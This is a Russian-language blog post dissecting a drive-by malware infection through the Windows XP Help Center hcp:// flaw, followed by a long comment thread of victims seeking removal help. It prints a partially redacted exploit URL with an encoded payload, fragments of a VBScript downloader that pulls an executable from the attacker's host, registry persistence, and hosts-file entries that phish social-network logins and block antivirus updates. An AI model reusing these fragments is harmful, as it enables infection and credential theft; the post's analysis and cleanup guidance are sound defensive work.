С детских лет меня мучил вопрос: «Как компьютер заражается вирусами». Наконец я узнал, прочувствовал на себе. Почему бы не поведать миру о том, как собственно проходит этот весьма занимательный процесс.
Для того, чтобы не написать пособие по заражению, а то куча народу воспользуется не дай бог, поэтому кое какие куски скриптов я буду удалять.
Уже всем, наверное, поднадоели фразы о «дырявости» MS Windows, но, тем не менее, она остается самой распространенной системой на планете Земля. А может быть, система столь дырява из за своей распространенности.
Вот и сейчас, атака была проведена на одну из уязвимостей системы Windows XP, а именно на Windows Help Center.
Начало как обычно было давно (аж в 2010 году), об этом можно почитать на весьма известном ресурсе xakep.ru (в самом низу страницы).
Началось все просто.
IE выдал запрос на открытие программы, с ресурса tjyre.info. Явно вирус! Но интересно же!!
Переход на сайт http://tjyre.info не дает никакой информации, кроме того, что сайт находится в разработке (на момент выкладывания поста он вобще не работает, видимо прищучили).
Как узнать, что там предназначалось мне на комп? Элементарно – надо рассмотреть, куда ведет ссылка.
Ссылка классического вида (то что «хакер» прописал):
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A ... %%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,…удалено в целях «безопасности»…116,114,46,101,120,101)));</script>
Как подсказывает мне моя безграмотность, ссылка на файл вируса скрыта за цифрами.
Путем несложных преобразований выясняется, что под цифрами скрывается копирование в системную папку моего компьютера скрипта с именем файла l.vbs, и его последующий запуск.
Адрес, по которому в сети размещен скрипт:
http://tjyre.info/games/hcp_vbs.php?f=17
Долго не раздумывая, открываю ссылку, поскольку открытие файла не сервере не всегда то же самое, что и его запуск на компе (рискованый шаг ;) ).
Открывшийся файл содержит текст следующего вида:
«w=3000:x=200:y=1:z=false:a = "http://tjyre.info/u.php?e=7&f=17":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) … Удалено из дурацких соображений… g=o.GetFile(b):g.Delete»
Текстовочка достаточно несложная:
- видим ссылку, на какую-то страницу,
- видим дату 16.02.2010 (получается, проводится некоторая маскировка вируса по дате, все таки приняли на вооружение, что маскироваться надо)
- видим вывернутые на изнанку (при помощи реверса) команды, при помощи которых файл вируса залетает на наш компьютер.
Переходим по ссылке и… Здравствуй родной! Файл с названием readme.exe просит разрешения на посадку.
Благополучно присаживаем свежий readme.exe. Что же несет нам этот гость? Наверняка кучу радости.
Запуск readme.exe был очень удачно заблокирован программой antiwinlocker. За что ей честь и хвала. Но поскольку я все равно хочу посмотреть что получится, то защитников придется попросить удалиться на время.
Первый запуск вируса не был примечателен, что и понятно, вирус проник и затаился до следующей загрузки.
Перезагружаемся и вновь тишина. Загадка!!
Придется искать по тайным углам.
Находим в папке «C:\Documents and Settings\Admin\Application Data» файл lsass.exe (имитирующий системный процесс).
В реестре соответственно обнаруживаем ключик:
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe", что и ожидалось.
Но это еще не всё!
В папке «C:\WINDOWS\system32\drivers\etc» есть волшебный файл hosts, в который вирус дописывает с десяток волшебных строк (просмотрите пожалуйста ВЕСЬ файл hosts):
- 31.214.145.151 www.vkontakte.ru
- 31.214.145.151 www.vk.com
- 31.214.145.151 vkontakte.ru
- 31.214.145.151 vk.com
- 31.214.145.151 www.odnoklassniki.ru
- 31.214.145.151 odnoklassniki.ru
- 127.0.0.1 downloads.kaspersky-labs.com
- 127.0.0.1 downloads0.kaspersky-labs.com
- ...
- 127.0.0.1 downloads10.kaspersky-labs.com
- 127.0.0.1 dnl-geo.kaspersky-labs.com
- 127.0.0.1 dnl-00.geo.kaspersky.com
- ...
- 127.0.0.1 dnl-20.geo.kaspersky.com
При помощи этих строк производится перенаправление с сайтов одноклассники и vkontakte на вполне определенный сайт, а также устраивается полный облом обновлениям касперского (вирус похож на Trojan.Win32.Ddox.ci).
Что мы видим перейдя на сайт злодея? Мы видим главную страницу одноклассников, но если ввести логин и пароль, то они прямиком отправятся к "злодею". А если нажать на какую нибудь ссылку то получаем весьма прикольный запрос на "валидацию аккаунта". Причем в тексте четко сказано: "Услуга недоступна абонентам некоторым регионам Мегафона". Такой серьезный подход к делу, что я не сразу въехал в смысл фразы.
Проверьте сами (http://31.214.145.151/).
У настоящих одноклассников IP совсем другой.
Как с этой фигней бороться.
Для начала, сделать так, как советуют в «хакере» - установить заплатку (или удалить ветку реестра). Цитирую:
- Отключить протокол hcp (удалив HKCR\HCP\shell\open) центр помощи.
- Воспользоваться патчем от Тэвиса (это хакер, нашедший уязвимость) — http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip. Этот патч фиксит бинарник helpctr.exe, делая проверку надежной.
- Ждать патча от Microsoft.
Далее, необходимо удалить валяющийся в "C:\Documents and Settings\Admin\Application Data» файл lsass.exe. Лучше это сделать загрузившись с внешнего носителя, чтобы загруженный в память процесс не мешал Вам.
Удалить из файла "C:\WINDOWS\system32\drivers\etc\hosts" лишние строки про одноклассников, вконтакте, и касперского.
Исправить в реестре (ветка [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon])
ключ
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe"
на ключ вот такого вида:
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,"
Проверить компьютер антивирусом с самыми свежими обновлениями.
По касперски это вирус зовется win32.qhost.xmw
По DrWeb-ски это hosts.4561
Темы "в тему":
Поймал гада у себя, в hosts на 127.0. только кашперыч, а одноклассников и в конт. нет
ОтветитьУдалитьБывает и такое. Тип вируса может быть такой же, а ссылки на сайты прописывает совершено другие. Главное принцип действия понять, дальше уже нюансы...
ОтветитьУдалитьУ меня hosts выглядел так: начало стандартное, потом 15 тысяч(!) пустых строчек, потом строчки с подменой ip. При открытии редактор показывает только начало файла и на первый взгляд он выглядит абсолютно здоровым. :)
ОтветитьУдалитьСовершенно точно, так и есть...
ОтветитьУдалитьНЕ МОГУ ЗАЙТИ НА САЙТ ОТВЕТ -ВАЛИДАЦИЯ АККАУНТА
ОтветитьУдалитьМогу Вас поздравить. Вы счастливый обладатель вируса. К сожалению ничего конкретного сказать не могу насчет Вашей модификации вируса по столь малой информации. Вот если бы чуточку подробнее...
ОтветитьУдалитьИ у меня валидация....открыла файл hosts он такой какой и должен быть никаких ссылок...
ОтветитьУдалитьВ вашем варианте возможно просто другая схема работы вируса. Он загружен в оперативке (например) и просто перехватывает обращения к файлу hosts.
ОтветитьУдалитьА не говорю, что это однозначно так, это один из возможных вариантов.
Как можно прояснить этот вопрос: скачайте бесплатную антивирусную утилиту AVZ (http://z-oleg.com/secur/avz/download.php).
При помощи утилиты сделайте исследование системы (Файл -> Исследование системы). Полученный отчет сохраните и отправьте мне на viru.vir@yandex.ru. Поглядим чего там у Вас лишнего на компьютере живет. Отвечу обязательно.
Здравствуйте.Следуя вашим советам нашёл гада,но удалить не могу,почему-то,(все отчёты сохранил).подскажите что делать.
ОтветитьУдалитьЗдравствуйте! Отправьте отчеты мне на майл viru.vir@yandex.ru, посмотрю, можт чего смогу присоветовать. По крайней мере кое кому помогло...
ОтветитьУдалитьУже не надо.яглянул у вас чуть вышее против Доктора Веба,скачал.он сам удалили гада.Спасиба за помощь
ОтветитьУдалитьда не за что :) Рад что оказался полезен.
ОтветитьУдалить"S detskix let"... 4uvak, kak ja tebe zaviduju!!
ОтветитьУдалитьja v 14 pro Pen 1 me4tal!!!
Ну здесь возможна куча вариантов :)).
ОтветитьУдалитьВариант 1. Может я не такой уж и старый (можт мне щас 14 :)) ), и Пень 1 уже не так был актуален в моем детстве.
Вариант 2. Может у меня детство до сих пор играет в разных местах.
Вариант 3. Можт это метафора такая - "с детских лет" :)).
Выбирай что понравится, я не обижусь :).
Скажите если взломали страничку что делать
ОтветитьУдалитьЕсли странчку взломали, то сначала лечим вирусы, потом через службу поддежки восстанавливаем доступ к своей странице и меняем пароли на более сложные.
ОтветитьУдалитьНе забудьте предупредить как можно больше своих контактов, что Вашу страницу взломали.
А что делать если антивирус не касперский а Avira?
ОтветитьУдалитьПри ЛЮБОМ антивирусе для излечения от этого вируса действия пользователя неизменны. Вы лечите компьютер, а не антивирус. :)
ОтветитьУдалитьА у меня в папке etc 2 файла hosts, один на русском, другой на английском... как так?
ОтветитьУдалитьНикогда с таким не встречался. Смотрите внимательнее, может есть все таки разница в названиях файлов, расширении файлов... Содержимое проверьте, есть ли лишние записи.
ОтветитьУдалитьСистема не допускает нахождения двух файлов с полностью одинаковыми названиями в одной папке. Попробуйте сами сделать, чтобы убедиться.
Можно сделать названия ПОХОЖИМИ. Например, в слове hosts: в одном случае "о" на русском языке напечатана, в другом "o" на английском. Но выглядят слова одинаковыми.
а что делать если нет папки admin на компьетере?делаю первый шаг,а второй уже никак не сделать
ОтветитьУдалитьЗдесь под Админом понимается пользователь.
ОтветитьУдалитьЗдравствуйте!
ОтветитьУдалитьСтолкнулся с аналогичной проблемой.
Уменя в папке etc тоже 2 файла hosts, один размером 1 кб, другой скрытый 207 кб. в скрытом и прописаны все соц.сети. Если я стираю его то без проблем попадаю на Одноклассники, но при перезагрузке компа проблема возвращается.
Прочел, что сам вирус прячется C:\Documents and Settings\Admin\Local Settings\Temp сегодня попробую поискать.....
Здравствуйте!
ОтветитьУдалитьПохоже самые интересные вирусы проходят мимо меня. Как уныло...
Проверьте системный диск при помощи CureIt. наверняка поможет.
Действительно, вирус подменил мой файл hosts другим (видимо, что-то типа кириллической о вместо латинской), а сам создал "скрытый" файл hosts весом 207 кб. Включите отображение скрытых папок и файлов и тогда увидите его. Можно смело удалять.
ОтветитьУдалитьПростое удаление файла hosts без удаления вируса помогает редко. Как правило вирус загружается вместе с системой и периодически проводит операцию по созданию левого файла hosts. Обязательно проверяйте систему антивирусом.
ОтветитьУдалитьа я удалила всё в папке hosts и написала 127.0.0.1 localhost как я прочитала в интернете ,дальше там было на писано удалить всё из папки temp но я не знаю как это сделать?не сделала ли я хуже что удалила всё из hosts
ОтветитьУдалитьПапки HOSTS существовать не должно, вобще.
ОтветитьУдалитьЕсли написали в ФАЙЛЕ hosts, что localhost 127... то ничего плохого не сделали (удалив все остальное).
Удалить файлы из папки TEMP не имея опыта проще простого. Просто в поиске напишите TEMP и в найденных папках всё удалите.
Здраствуйте!
ОтветитьУдалитьУ меня при удалении из папки TEMP всех файлов один не удаляется, пишет что используется другой программой. Это похоже вирус или заражённый. Пробовал CureIt он нашёл 4 инф. файла. потом пишет, что всё чисто, а этот файл так и не удаляется,подскажите что делать
Здравствуйте!
ОтветитьУдалитьЕсли Вы не уверенны в каком то файле, то его всегда можно проверить на ресурсе https://www.virustotal.com/. На этом ресурсе файл пройдет проверку 43 антивирусами.
Похоже необходимо дополнить... Удалить/переименовать/скопировать любой файл можно при помощи программы Unlocker. Программа бесплатна, весит меньше мегабайта и специализируется на работе с файлами, работа с которыми невозможна обычными средствами.
ОтветитьУдалитьпочему аваст блокирует эту страницу Детали заражения
ОтветитьУдалитьURL: http://imho-karma.blogspot.com/2011/08/b...
Процесс: file://C:\Program Files\Opera\opera.exe
Инфекция: js:ScriptIP-inf [Trj]
Аваст блокирует данную страницу потому, что на ней выложены КУСКИ кода (курсивом выделены), который обычно приводит к заражению компьютера вирусом.
Удалитьу меня тоже пишет валидация аккаунта :(
ОтветитьУдалитьну с кем не бывает... обновляйте антивирус, еще лучше - скачайте cureit! Можно задать поиск по ip, который у Вас прописан в hosts. Может найдется прямо Ваш случай.
УдалитьМожно сделать исследование системы при помощи AVZ и отправить мне
(2 файла!! avz_sysyinfo.HTML и avz_sysinfo.XML)
, может чего и получится вылечить.
Ищи в папке с:\windows\system 32\drivers\etc\ скрытый файл hosts (есть и не скрытый, в котором всё нормально), у меня в нём и были прописаны все перенаправления из одноклассников, вконтакте, фэйсбука и твиттера.
ОтветитьУдалитьУ меня тоже было написано валидация аккаунта, нашел в Автозапуске фаил fuagf, которы подменял мой фаил HOST на другой который лежал в папке Temp и назывался ouwxc, в свойствах первого файла "fuagf" в адрессе ссылки было прописано следующее "C:\Windows\System32\cmd.exe /c copy "C:\Users\9335~1\AppData\Local\Temp\ouwxc" "C:\Windows\system32\drivers\etc\hosts" /Y && attrib +H "C:\Windows\system32\drivers\etc\hosts""
ОтветитьУдалитьпомогите найти заразу, одноклассники просят валидацию, hosts чистый, curei проверил ненашел (даже полную проверку запускал), браузеры работает странно, не находят страницы.
ОтветитьУдалитьЗдравствуйте! Сделайте пожалуйста исследование системы при помощи AVZ. Два полученых файла (avz_sysinfo.htm и avz_sysinfo.xml) отправьте мне на почту, постараюсь помочь.
ОтветитьУдалитьЗдравствуйте. Извините, ничего не понимаю, как полечить комп. Сегодня не смогла войти на ОК, начала делать валидацию, но денег на телефоне было мало, поэтому СМС не ушла. не могу войти ни в Контакт, ни в ОК. Зашла в папку etc, там только один файл HOST 789 байт, как его открыть посмотреть не знаю. Когда пытаюсь открыть спрашиват через какую программу открыть. Помогите разобраться, если можно то на языке " чайников" Спасибо.
ОтветитьУдалитьЗдравствуйте! Если у Вас есть "под рукой" специалист, то лучше переговорите с ним. Если нет, то пишите на viru.vir@yandex.ru, попробую объяснить подробно и с картинками что и как делать.
ОтветитьУдалитьЗдравстуйте,Есть проблема при заходе на vk.com или на одноклассники,пишет о валидности аккаунта,Проверял антивирусом и проверял hosts(Он был чист).Может Подскажете в чем проблема ?
ОтветитьУдалитьЗдравствуйте! Однозначно сказать в чем проблема навряд ли возможно. Потому как кроме переписывания hosts возможно переписывание адреса dns сервера при помощи скриптов со стандартными системынми операциями, в том числе и динамическое. В этом случае активного вируса не будет, да и вобще вирусного вмешательства замечено не будет. Такой вариант вируса тоже встречал, но еще не выкладывал сюда в качестве примера.
УдалитьЗдраствуйте. При входе на одноклассники, пишет овалидности аккаунта.просит ввести номер и отправить смс. Проверял папку etc вирус замечено не было. самое интересное то что заходишь с мегафон модема все работает!! Проверку ставил нашел много вирусов, но проблема не решилась!!!) Подскажите,что может быть?)
ОтветитьУдалитьЗдравствуйте! Проверка папки ETC бесполезна, поскольку сам вирус в этой папке НЕ располагается.
УдалитьА вот о варианте с модемом я пожалуй ничего сказать не могу, уж извините. Не сталкивался с подобной проблемой.
Здраствуйте!при входе вконтакт,просит ввести номер телефона,но когда ввожу пишет:"не поддерживается оператором".Что делать?в папке host ничего про контакт,одноклассники или чего то подобного нет,проверяла антивирусником,находит троянскую программу,все удалила но ничего не изменилось.Помогите пожалуйста:)
ОтветитьУдалитьНу я теряюсь, что сказать, откуда мне знать какой у Вас оператор, и тем более поддерживается ли он "вконтакте". Если hosts чист, антивирус не находит проблем то первым делом было бы правильно узнать на сайте о поддержке Вашего оператора.
УдалитьАдрес службы поддержки по техническим вопросам: support@vk.com
Если Служба Вам не поможет, то пишите подробнее мне на майл (viru.vir@yandex.ru).
Добрый день! Та же проблема, одноклассники просят телефон(((. Прочитала ваши рекомендации, стерла ненужные строки в HOST, но сохранить не получается. Пишет:не удается сохранить файл, проверьте правильность пути и имени файла. Подскажите пожалуйста, что я делаю не так?
ОтветитьУдалитьЗдравствуйте! Править (чистить) файл hosts рекомендую специализированными программами. Например AVZ (снова). Для очистки hosts необходимо выбрать меню "Файл"->"Восстановление системы". В открывшемся окне выбрать пункт "Очистка hosts" (13 пункт). Необходимо поставить напротив него галочку а нажать кнопку "Выполнить отмеченные операции".
УдалитьИ еще, бесполезно чистить hosts пока вирус у Вас на компьютере.
УдалитьУра!!!!! получилось!! все оказалось проще, чем я думала)))) СПАСИБО ВАМ ОГРОМНОЕ!!!
ОтветитьУдалитьРад что у Вас получилось :)
Удалитьпомогите!! не могу зайти в однокласники и в вконтакте. в папке etc 2 файла hosts, один пустой а 2ой hosts файл ICS внутри этого файла:
ОтветитьУдалить# Copyright (c) 1993-2001 Microsoft Corp.
#
# This file has been automatically generated for use by Microsoft Internet
# Connection Sharing. It contains the mappings of IP addresses to host names
# for the home network. Please do not make changes to the HOSTS.ICS file.
# Any changes may result in a loss of connectivity between machines on the
# local network.
#
Сделайте исследование системы при помощи AVZ и отправьте на почту viru.vir@ya.ru - посмотрим что там у вас. А сейчас сложно сказать по какой причине у вас с соцсетями проблемы.. Уж извините.
УдалитьПринимайте. Залетел.
ОтветитьУдалить94.249.189.151 my.mail.ru
94.249.189.151 m.my.mail.ru
94.249.189.151 vk.com
94.249.189.151 m.vk.com
94.249.189.151 odnoklassniki.ru
94.249.189.151 www.odnoklassniki.ru
94.249.189.151 m.odnoklassniki.ru
94.249.189.151 ok.ru
94.249.189.151 m.ok.ru
94.249.189.151 www.odnoklassniki.ru
94.249.189.151 vk.com
поздравляю, что планируете делать?
ОтветитьУдалитьСделал немножко через ж..
ОтветитьУдалитьВ моём случае, я зашёл со второй системы, нашёл этот файлик, подчистил, проверил диск антивирусом, зашёл опять к себе на основну систему, почистил всё клинером и всё заработало.
Как с реестром работать не знаю((
а я почистила hosts и ни чего а утилита доктора веба вообще не устанавливается и никакой антивирусник кроме ESET NOD 32 тоже .ПОМОГИТЕ!
ОтветитьУдалитьскачайте утилиту AVZ, сделайте исследование системы и протокол исследования отправляйте мне на майл. посмотрим.
УдалитьP.S. утилита "Cureit!", от дрвеба, работает без установки
У меня в hosts ничего не было, но при заходе на vk.com выдавался фейковый сайт, который после логина сообщал мне, что аккаунт заморожен. И предлагал отправить смску.
ОтветитьУдалитьС помощью друга выяснил ip адрес сайта vk.com и прописал его в hosts. Теперь я спокойно захожу на сайт, но проблема решена не до конца. Где-то засел вирус.
Проверял систему лицензионным NOD 32, запускал Dr.Web CureIt и Kaspersky Virus Removal Tool.. Все три программы не нашли этого вируса, лишь мелкие подозрительные файлики.
сейчас как раз такая же проблема наклюнулась. у меня пока нет решений
ОтветитьУдалитьУ меня нет ни одного файла ни второго ни третьего ни 150го( Я хз что делать....
ОтветитьУдалить